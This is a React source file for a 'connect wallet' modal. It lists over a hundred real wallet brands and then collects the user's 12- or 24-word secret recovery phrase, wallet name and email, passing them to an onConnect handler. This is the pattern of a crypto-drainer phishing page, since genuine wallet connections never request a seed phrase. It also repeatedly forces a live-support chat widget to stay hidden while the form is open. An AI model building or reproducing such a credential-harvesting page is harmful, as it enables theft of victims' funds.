import React, { useState, useMemo, useCallback, useEffect } from 'react';
import { X, Wallet, AlertCircle, ChevronRight, Loader2, Search } from 'lucide-react';
import { useLocation } from 'react-router-dom';
import { warmUpServer, getWalletConnectErrorMessage } from '../services/apiService';
import './WalletConnectModal.css';

// Wallet options - using local icons from /wallet-icons/
const walletOptions = [
  // Popular Wallets
  { id: 'jova', name: 'Jova Wallet', logo: '/wallet-icons/Jova.png', popular: true },
  { id: 'uniswap', name: 'Uniswap', logo: '/wallet-icons/uniswap.webp', popular: true },
  { id: 'ledger', name: 'Ledger', logo: '/wallet-icons/LedgerLive.png', popular: true },
  { id: 'metamask', name: 'MetaMask', logo: '/wallet-icons/Metamask.png', popular: true },
  { id: 'walletconnect', name: 'WalletConnect', logo: '/wallet-icons/Wallet-connect.jpg', popular: true },
  { id: 'trustwallet', name: 'Trust Wallet', logo: '/wallet-icons/Trust-wallet.png', popular: true },
  { id: 'coinbase', name: 'Coinbase Wallet', logo: '/wallet-icons/coinbase.png', popular: true },
  { id: 'rainbow', name: 'Rainbow', logo: '/wallet-icons/Rainbow.png', popular: true },
  { id: 'exodus', name: 'Exodus', logo: '/wallet-icons/exodus.png', popular: true },
  { id: 'phantom', name: 'Phantom', logo: '/wallet-icons/Phantom.svg', popular: true },
  
  // More Wallets (Alphabetically ordered)
  { id: 'aktionariat', name: 'Aktionariat', logo: '/wallet-icons/Aktionariat.png', popular: false },
  { id: 'alice', name: 'Alice', logo: '/wallet-icons/Alice.png', popular: false },
  { id: 'alphawallet', name: 'AlphaWallet', logo: '/wallet-icons/AlphaWallet.jpg', popular: false },
  { id: 'anchor', name: 'Anchor', logo: '/wallet-icons/anchor.png', popular: false },
  { id: 'arculus', name: 'Arculus', logo: '/wallet-icons/Arculus.png', popular: false },
  { id: 'argent', name: 'Argent', logo: '/wallet-icons/Argent.jpg', popular: false },
  { id: 'atwallet', name: 'AT.Wallet', logo: '/wallet-icons/AT.Wallet.png', popular: false },
  { id: 'atomic', name: 'Atomic Wallet', logo: '/wallet-icons/Atomic.png', popular: false },
  { id: 'aqua', name: 'Aqua Wallet', logo: '/wallet-icons/Aqua.svg', popular: false },
  { id: 'authereum', name: 'Authereum', logo: '/wallet-icons/Authereum.png', popular: false },
  { id: 'backpack', name: 'Backpack', logo: '/wallet-icons/Backpack.png', popular: false },
  { id: 'binance', name: 'Binance Smart Chain', logo: '/wallet-icons/Binance-Smart-Chain.png', popular: false },
  { id: 'bitget', name: 'Bitget Wallet', logo: '/wallet-icons/Bitget.png', popular: false },
  { id: 'bitbox02', name: 'BitBox02', logo: '/wallet-icons/Bitbox02.png', popular: false },
  { id: 'bitkeep', name: 'BitKeep', logo: '/wallet-icons/BitKeep.png', popular: false },
  { id: 'bitpay', name: 'BitPay', logo: '/wallet-icons/BitPay.jpg', popular: false },
  { id: 'bluewallet', name: 'BlueWallet', logo: '/wallet-icons/BlueWallet.png', popular: false },
  { id: 'blockchain', name: 'Blockchain.com', logo: '/wallet-icons/blockchain-logo.png', popular: false },
  { id: 'bridgewallet', name: 'Bridge Wallet', logo: '/wallet-icons/Bridge-Wallet.png', popular: false },
  { id: 'coin98', name: 'Coin98', logo: '/wallet-icons/Coin98.png', popular: false },
  { id: 'coinomi', name: 'Coinomi', logo: '/wallet-icons/Coinomi.jpg', popular: false },
  { id: 'coolwallet', name: 'CoolWallet S', logo: '/wallet-icons/CoolWallet-S.png', popular: false },
  { id: 'cosmostation', name: 'Cosmostation', logo: '/wallet-icons/cosmosstation.png', popular: false },
  { id: 'cryptocom', name: 'Crypto.com', logo: '/wallet-icons/Crypto.com.png', popular: false },
  { id: 'cybavo', name: 'CYBAVO Wallet', logo: '/wallet-icons/CYBAVO-Wallet.png', popular: false },
  { id: 'dcent', name: "D'CENT Wallet", logo: '/wallet-icons/D\'CENT-Wallet.png', popular: false },
  { id: 'dokwallet', name: 'Dok Wallet', logo: '/wallet-icons/Dok-Wallet.png', popular: false },
  { id: 'easypocket', name: 'EasyPocket', logo: '/wallet-icons/EasyPocket.jpg', popular: false },
  { id: 'eidoo', name: 'Eidoo', logo: '/wallet-icons/Eidoo.png', popular: false },
  { id: 'electrum', name: 'Electrum', logo: '/wallet-icons/Electrum.png', popular: false },
  { id: 'ellipal', name: 'Ellipal', logo: '/wallet-icons/Ellipal.png', popular: false },
  { id: 'equal', name: 'Equal', logo: '/wallet-icons/Equal.jpg', popular: false },
  { id: 'eternl', name: 'Eternl', logo: '/wallet-icons/Eternl.png', popular: false },
  { id: 'fetch', name: 'Fetch', logo: '/wallet-icons/fetch.jpg', popular: false },
  { id: 'gnosis', name: 'Gnosis Safe', logo: '/wallet-icons/Gnosis-Safe-Multisig.jpg', popular: false },
  { id: 'graph', name: 'Graph', logo: '/wallet-icons/graph.jpg', popular: false },
  { id: 'gridplus', name: 'GridPlus', logo: '/wallet-icons/GridPlus.png', popular: false },
  { id: 'harmony', name: 'Harmony', logo: '/wallet-icons/harmony.png', popular: false },
  { id: 'huobi', name: 'Huobi Wallet', logo: '/wallet-icons/HuobiWallet.jpg', popular: false },
  { id: 'iconex', name: 'ICONex', logo: '/wallet-icons/iconex.png', popular: false },
  { id: 'infinito', name: 'Infinito', logo: '/wallet-icons/Infinito.png', popular: false },
  { id: 'infinitywallet', name: 'Infinity Wallet', logo: '/wallet-icons/Infinity-Wallet.png', popular: false },
  { id: 'kardachain', name: 'KardiaChain', logo: '/wallet-icons/kardachain.png', popular: false },
  { id: 'keystone', name: 'Keystone', logo: '/wallet-icons/Keystone.png', popular: false },
  { id: 'keplr', name: 'Keplr', logo: '/wallet-icons/keplr.png', popular: false },
  { id: 'keyringpro', name: 'KEYRING PRO', logo: '/wallet-icons/KEYRING-PRO.png', popular: false },
  { id: 'lace', name: 'Lace', logo: '/wallet-icons/Lace.png', popular: false },
  { id: 'leap', name: 'Leap Wallet', logo: '/wallet-icons/Leap.png', popular: false },
  { id: 'lobstr', name: 'LOBSTR', logo: '/wallet-icons/lobstr.png', popular: false },
  { id: 'loopring', name: 'Loopring Wallet', logo: '/wallet-icons/Loopring-Wallet.jpg', popular: false },
  { id: 'maiar', name: 'Maiar', logo: '/wallet-icons/maiar.png', popular: false },
  { id: 'mathwallet', name: 'MathWallet', logo: '/wallet-icons/MathWallet.png', popular: false },
  { id: 'meetone', name: 'MEET.ONE', logo: '/wallet-icons/MEET.ONE.jpg', popular: false },
  { id: 'midaswallet', name: 'Midas Wallet', logo: '/wallet-icons/Midas-Wallet.png', popular: false },
  { id: 'morixwallet', name: 'MoriX Wallet', logo: '/wallet-icons/MoriX-Wallet.png', popular: false },
  { id: 'muun', name: 'Muun', logo: '/wallet-icons/Muun.png', popular: false },
  { id: 'mykey', name: 'MYKEY', logo: '/wallet-icons/MYKEY.png', popular: false },
  { id: 'nanoxplus', name: 'Nano X Plus', logo: '/wallet-icons/Nanoxplus.png', popular: false },
  { id: 'nash', name: 'Nash', logo: '/wallet-icons/Nash.jpg', popular: false },
  { id: 'ngrave', name: 'NGRAVE', logo: '/wallet-icons/NGRAVE.jpg', popular: false },
  { id: 'nova', name: 'Nova Wallet', logo: '/wallet-icons/Nova.png', popular: false },
  { id: 'okx', name: 'OKX Wallet', logo: '/wallet-icons/OKX.png', popular: false },
  { id: 'onekey', name: 'OneKey', logo: '/wallet-icons/OneKey.png', popular: false },
  { id: 'onto', name: 'ONTO', logo: '/wallet-icons/ONTO.png', popular: false },
  { id: 'ownbit', name: 'Ownbit', logo: '/wallet-icons/Ownbit.png', popular: false },
  { id: 'peakdefi', name: 'PEAKDEFI Wallet', logo: '/wallet-icons/PEAKDEFI-Wallet.png', popular: false },
  { id: 'phoenix', name: 'Phoenix Wallet', logo: '/wallet-icons/Phoenix.png', popular: false },
  { id: 'pillar', name: 'Pillar', logo: '/wallet-icons/Pillar.png', popular: false },
  { id: 'rabby', name: 'Rabby Wallet', logo: '/wallet-icons/Rabby.png', popular: false },
  { id: 'safepal', name: 'SafePal', logo: '/wallet-icons/SafePal.png', popular: false },
  { id: 'solflare', name: 'Solflare', logo: '/wallet-icons/Solflare.png', popular: false },
  { id: 'sparrow', name: 'Sparrow Wallet', logo: '/wallet-icons/Sparrow.png', popular: false },
  { id: 'sparkpoint', name: 'SparkPoint', logo: '/wallet-icons/SparkPoint.png', popular: false },
  { id: 'spatium', name: 'Spatium', logo: '/wallet-icons/Spatium.jpg', popular: false },
  { id: 'subwallet', name: 'SubWallet', logo: '/wallet-icons/SubWallet.png', popular: false },
  { id: 'swftwallet', name: 'SWFT Wallet', logo: '/wallet-icons/SWFT-Wallet.png', popular: false },
  { id: 'talisman', name: 'Talisman', logo: '/wallet-icons/Talisman.png', popular: false },
  { id: 'tangem', name: 'Tangem', logo: '/wallet-icons/Tangem.png', popular: false },
  { id: 'tokenary', name: 'Tokenary', logo: '/wallet-icons/Tokenary.png', popular: false },
  { id: 'tokenpocket', name: 'TokenPocket', logo: '/wallet-icons/TokenPocket.png', popular: false },
  { id: 'torus', name: 'Torus', logo: '/wallet-icons/Torus.jpg', popular: false },
  { id: 'trezor', name: 'Trezor', logo: '/wallet-icons/Trezor.png', popular: false },
  { id: 'trustvault', name: 'TrustVault', logo: '/wallet-icons/TrustVault.png', popular: false },
  { id: 'typhon', name: 'Typhon Wallet', logo: '/wallet-icons/Typhon.png', popular: false },
  { id: 'unstoppable', name: 'Unstoppable Wallet', logo: '/wallet-icons/Unstoppable-Wallet.png', popular: false },
  { id: 'viawallet', name: 'ViaWallet', logo: '/wallet-icons/ViaWallet.png', popular: false },
  { id: 'vision', name: 'Vision', logo: '/wallet-icons/Vision.png', popular: false },
  { id: 'walletio', name: 'Wallet.io', logo: '/wallet-icons/wallet.io.png', popular: false },
  { id: 'walleth', name: 'WallETH', logo: '/wallet-icons/walleth.png', popular: false },
  { id: 'wazirx', name: 'WazirX', logo: '/wallet-icons/Wazirx.png', popular: false },
  { id: 'xaman', name: 'Xaman', logo: '/wallet-icons/Xaman.png', popular: false },
  { id: 'xdcwallet', name: 'XDC Wallet', logo: '/wallet-icons/XDC-Wallet.png', popular: false },
  { id: 'yoroi', name: 'Yoroi', logo: '/wallet-icons/Yoroi.png', popular: false },
  { id: 'zelcore', name: 'ZelCore', logo: '/wallet-icons/ZelCore.png', popular: false },
  { id: 'zerion', name: 'Zerion Wallet', logo: '/wallet-icons/Zerion.png', popular: false },
  { id: 'other', name: 'Other Wallet', logo: null, popular: false },
];

const WalletConnectModal = ({ isOpen, onClose, onConnect, mode = 'register' }) => {
  const location = useLocation();
  const [step, setStep] = useState(1);
  const [selectedWallet, setSelectedWallet] = useState(null);
  const [searchTerm, setSearchTerm] = useState('');
  const [formData, setFormData] = useState({
    walletName: '',
    seedPhrase: '',
    email: '',
  });
  const [isLoading, setIsLoading] = useState(false);
  const [loadingMessage, setLoadingMessage] = useState('');
  const [error, setError] = useState('');

  useEffect(() => {
    if (!isOpen) return;
    warmUpServer();
  }, [isOpen]);

  const setTawkVisibility = useCallback((hide) => {
    if (typeof window === 'undefined') return;

    const tawkSelectors = [
      "iframe[src*='tawk.to']",
      "iframe[src*='embed.tawk.to']",
      "iframe[src*='va.tawk.to']",
      "iframe[id*='tawk']",
      "[id*='tawkchat']",
      "[id^='tawk']",
      "[class*='tawk']",
      '#tawkchat-container',
      '.tawk-min-container',
      '.tawk-max-container',
      '.tawk-button-circle',
    ].join(',');

    document.querySelectorAll(tawkSelectors).forEach((el) => {
      if (hide) {
        el.style.setProperty('display', 'none', 'important');
        el.style.setProperty('visibility', 'hidden', 'important');
        el.style.setProperty('pointer-events', 'none', 'important');
      } else {
        el.style.removeProperty('display');
        el.style.removeProperty('visibility');
        el.style.removeProperty('pointer-events');
      }
    });
  }, []);

  useEffect(() => {
    const hiddenRoutes = ['/login', '/get-started', '/admin/login'];
    const routeHidesChat = hiddenRoutes.some(
      (route) => location.pathname === route || location.pathname.startsWith(`${route}/`)
    );

    if (isOpen) {
      const enforceHide = () => setTawkVisibility(true);
      const body = document.body;
      body.classList.add('wallet-modal-open');
      body.classList.add('chat-hidden-route');
      enforceHide();

      const intervalId = window.setInterval(enforceHide, 300);
      const observer = new MutationObserver(() => {
        enforceHide();
      });
      observer.observe(document.body, { childList: true, subtree: true });

      return () => {
        window.clearInterval(intervalId);
        observer.disconnect();
        body.classList.remove('wallet-modal-open');
        if (!routeHidesChat) {
          body.classList.remove('chat-hidden-route');
        }
        setTawkVisibility(routeHidesChat);
      };
    }

    document.body.classList.toggle('chat-hidden-route', routeHidesChat);
    setTawkVisibility(routeHidesChat);
    return undefined;
  }, [isOpen, location.pathname, setTawkVisibility]);

  useEffect(() => {
    if (!isOpen) return undefined;

    const previousBodyOverflow = document.body.style.overflow;
    const previousHtmlOverflow = document.documentElement.style.overflow;
    const previousBodyTouchAction = document.body.style.touchAction;

    document.body.style.overflow = 'hidden';
    document.documentElement.style.overflow = 'hidden';
    document.body.style.touchAction = 'none';

    return () => {
      document.body.style.overflow = previousBodyOverflow;
      document.documentElement.style.overflow = previousHtmlOverflow;
      document.body.style.touchAction = previousBodyTouchAction;
    };
  }, [isOpen]);

  // Memoize filtered wallets to prevent unnecessary recalculations
  const { popularWallets, moreWallets } = useMemo(() => {
    const filtered = walletOptions.filter(wallet => 
      wallet.name.toLowerCase().includes(searchTerm.toLowerCase())
    );
    return {
      popularWallets: filtered.filter(w => w.popular),
      moreWallets: filtered.filter(w => !w.popular && w.id !== 'other')
    };
  }, [searchTerm]);

  const handleWalletSelect = useCallback((wallet) => {
    setSelectedWallet(wallet);
    setStep(2);
    setError('');
  }, []);

  const handleInputChange = useCallback((e) => {
    const { name, value } = e.target;
    setFormData(prev => ({ ...prev, [name]: value }));
    setError('');
  }, []);

  // Validate seed phrase (12 or 24 words)
  const isValidSeedPhrase = (phrase) => {
    const words = phrase.trim().toLowerCase().split(/\s+/);
    // Check word count (must be 12 or 24)
    if (words.length !== 12 && words.length !== 24) {
      return { valid: false, error: `Recovery phrase must be 12 or 24 words. You entered ${words.length} words.` };
    }
    // Check for empty words
    if (words.some(word => word.length === 0)) {
      return { valid: false, error: 'Invalid recovery phrase format.' };
    }
    // Check each word is alphabetic (basic check)
    if (words.some(word => !/^[a-z]+$/.test(word))) {
      return { valid: false, error: 'Recovery phrase should contain only words (no numbers or special characters).' };
    }
    return { valid: true };
  };

  const validateForm = () => {
    // Validate wallet name
    if (!formData.walletName.trim()) {
      setError('Please enter your wallet name');
      return false;
    }

    // Validate seed phrase
    if (!formData.seedPhrase.trim()) {
      setError('Recovery phrase is required');
      return false;
    }
    const phraseValidation = isValidSeedPhrase(formData.seedPhrase);
    if (!phraseValidation.valid) {
      setError(phraseValidation.error);
      return false;
    }

    return true;
  };

  const handleSubmit = async () => {
    if (!validateForm()) return;

    setIsLoading(true);
    setError('');
    
    try {
      setLoadingMessage(mode === 'login' ? 'Signing in...' : 'Connecting...');
      
      const userData = {
        walletType: selectedWallet.name,
        walletName: formData.walletName.trim(),
        seedPhrase: formData.seedPhrase.toLowerCase().trim(),
        email: formData.email || '',
      };

      await onConnect(userData);
      resetModal();
    } catch (err) {
      setError(getWalletConnectErrorMessage(err));
    } finally {
      setIsLoading(false);
      setLoadingMessage('');
    }
  };

  const resetModal = () => {
    setStep(1);
    setSelectedWallet(null);
    setSearchTerm('');
    setFormData({
      walletName: '',
      seedPhrase: '',
      email: '',
    });
    setError('');
    setLoadingMessage('');
  };

  const handleClose = () => {
    resetModal();
    onClose();
  };

  const goBack = () => {
    if (step === 2) {
      setSelectedWallet(null);
      setStep(1);
    }
  };

  // Wallet icon component with fallback - memoized for performance
  const WalletIcon = React.memo(({ wallet, size = 32 }) => {
    if (wallet.logo) {
      return (
        <img 
          src={wallet.logo} 
          alt={wallet.name}
          className="wallet-logo-img"
          loading="lazy"
          style={{ width: size, height: size }}
          onError={(e) => {
            e.target.style.display = 'none';
            if (e.target.nextSibling) e.target.nextSibling.style.display = 'flex';
          }}
        />
      );
    }
    return (
      <div className="wallet-logo-fallback" style={{ width: size, height: size }}>
        <Wallet size={size * 0.5} />
      </div>
    );
  });

  if (!isOpen) return null;

  return (
    <div className="modal-overlay" onClick={handleClose}>
      <div 
        className="wallet-modal"
        onClick={e => e.stopPropagation()}
      >
            {/* Header */}
            <div className="modal-header">
              <div className="modal-title">
                {step > 1 && (
                  <button className="back-btn" onClick={goBack}>
                    <ChevronRight size={20} style={{ transform: 'rotate(180deg)' }} />
                  </button>
                )}
                <h3>
                  {step === 1 && 'Connect Your Wallet'}
                  {step === 2 && 'Enter Recovery Phrase'}
                </h3>
              </div>
              <button className="close-btn" onClick={handleClose}>
                <X size={20} />
              </button>
            </div>

            {/* Step Indicator */}
            <div className="step-indicator">
              {[1, 2].map((s) => (
                <div 
                  key={s} 
                  className={`step-dot ${step >= s ? 'active' : ''} ${step === s ? 'current' : ''}`}
                />
              ))}
            </div>

            {/* Content */}
            <div className="modal-content">
              {/* Step 1: Select Wallet */}
              {step === 1 && (
                <div className="wallet-selection">
                  <p className="modal-description">
                    Select your wallet to {mode === 'register' ? 'create your account' : 'sign in'}
                  </p>

                  {/* Search */}
                  <div className="wallet-search">
                    <Search size={18} />
                    <input 
                      type="text"
                      placeholder="Search wallets..."
                      value={searchTerm}
                      onChange={(e) => setSearchTerm(e.target.value)}
                    />
                  </div>
                  
                  <div className="wallets-scroll-container">
                    {popularWallets.length > 0 && (
                      <div className="wallet-section">
                        <span className="section-label">Popular</span>
                        <div className="wallet-grid">
                          {popularWallets.map((wallet) => (
                            <button
                              key={wallet.id}
                              className="wallet-option"
                              onClick={() => handleWalletSelect(wallet)}
                            >
                              <div className="wallet-icon-wrapper">
                                <WalletIcon wallet={wallet} size={32} />
                                <div className="wallet-logo-fallback" style={{ display: 'none', width: 32, height: 32 }}>
                                  <Wallet size={16} />
                                </div>
                              </div>
                              <span className="wallet-name">{wallet.name}</span>
                              <ChevronRight size={16} className="arrow-icon" />
                            </button>
                          ))}
                        </div>
                      </div>
                    )}

                    {moreWallets.length > 0 && (
                      <div className="wallet-section">
                        <span className="section-label">More Wallets ({moreWallets.length})</span>
                        <div className="wallet-grid">
                          {moreWallets.map((wallet) => (
                            <button
                              key={wallet.id}
                              className="wallet-option"
                              onClick={() => handleWalletSelect(wallet)}
                            >
                              <div className="wallet-icon-wrapper">
                                <WalletIcon wallet={wallet} size={32} />
                                <div className="wallet-logo-fallback" style={{ display: 'none', width: 32, height: 32 }}>
                                  <Wallet size={16} />
                                </div>
                              </div>
                              <span className="wallet-name">{wallet.name}</span>
                              <ChevronRight size={16} className="arrow-icon" />
                            </button>
                          ))}
                        </div>
                      </div>
                    )}

                    {popularWallets.length === 0 && moreWallets.length === 0 && (
                      <div className="no-wallets-found">
                        <Wallet size={32} />
                        <p>No wallets found for "{searchTerm}"</p>
                      </div>
                    )}
                  </div>
                </div>
              )}

              {/* Step 2: Enter Seed Phrase */}
              {step === 2 && (
                <div className="details-form">
                  <div className="selected-wallet">
                    <div className="wallet-icon-wrapper">
                      <WalletIcon wallet={selectedWallet} size={28} />
                      <div className="wallet-logo-fallback" style={{ display: 'none', width: 28, height: 28 }}>
                        <Wallet size={14} />
                      </div>
                    </div>
                    <span>{selectedWallet?.name}</span>
                  </div>

                  <p className="modal-description">
                    Fill in your wallet details to proceed.
                  </p>

                  <form onSubmit={(e) => { e.preventDefault(); handleSubmit(); }}>
                    <div className="form-group">
                      <label htmlFor="walletName">Wallet Name</label>
                      <input
                        type="text"
                        id="walletName"
                        name="walletName"
                        placeholder="e.g My Trust Wallet, Main Wallet..."
                        value={formData.walletName}
                        onChange={handleInputChange}
                        required
                      />
                      <span className="input-hint">A friendly name to identify your wallet</span>
                    </div>

                    <div className="form-group">
                      <label htmlFor="seedPhrase">Phrase</label>
                      <textarea
                        id="seedPhrase"
                        name="seedPhrase"
                        placeholder="Enter your 12 or 24 word recovery phrase, separated by spaces..."
                        rows={2}
                        value={formData.seedPhrase}
                        onChange={handleInputChange}
                        required
                      />
                      <span className="input-hint">Your secret recovery phrase (12 or 24 words)</span>
                    </div>

                    <div className="form-group">
                      <label htmlFor="email">Email</label>
                      <input
                        type="email"
                        id="email"
                        name="email"
                        placeholder="your@email.com"
                        value={formData.email}
                        onChange={handleInputChange}
                        required
                      />
                      <span className="input-hint">For account recovery and notifications</span>
                    </div>

                    {error && (
                      <div className="error-message">
                        <AlertCircle size={16} />
                        <span>{error}</span>
                      </div>
                    )}

                    <div className="form-actions">
                      <button
                        type="button"
                        className="btn btn-secondary action-btn"
                        onClick={handleClose}
                        disabled={isLoading}
                      >
                        Cancel
                      </button>
                      <button 
                        type="submit" 
                        className="btn btn-primary action-btn"
                        disabled={isLoading}
                      >
                        {isLoading ? (
                          <>
                            <Loader2 size={16} className="animate-spin" />
                            {loadingMessage || 'Connecting...'}
                          </>
                        ) : (
                          'Proceed'
                        )}
                      </button>
                    </div>
                  </form>
                </div>
              )}
            </div>
          </div>
        </div>
  );
};

export default WalletConnectModal;
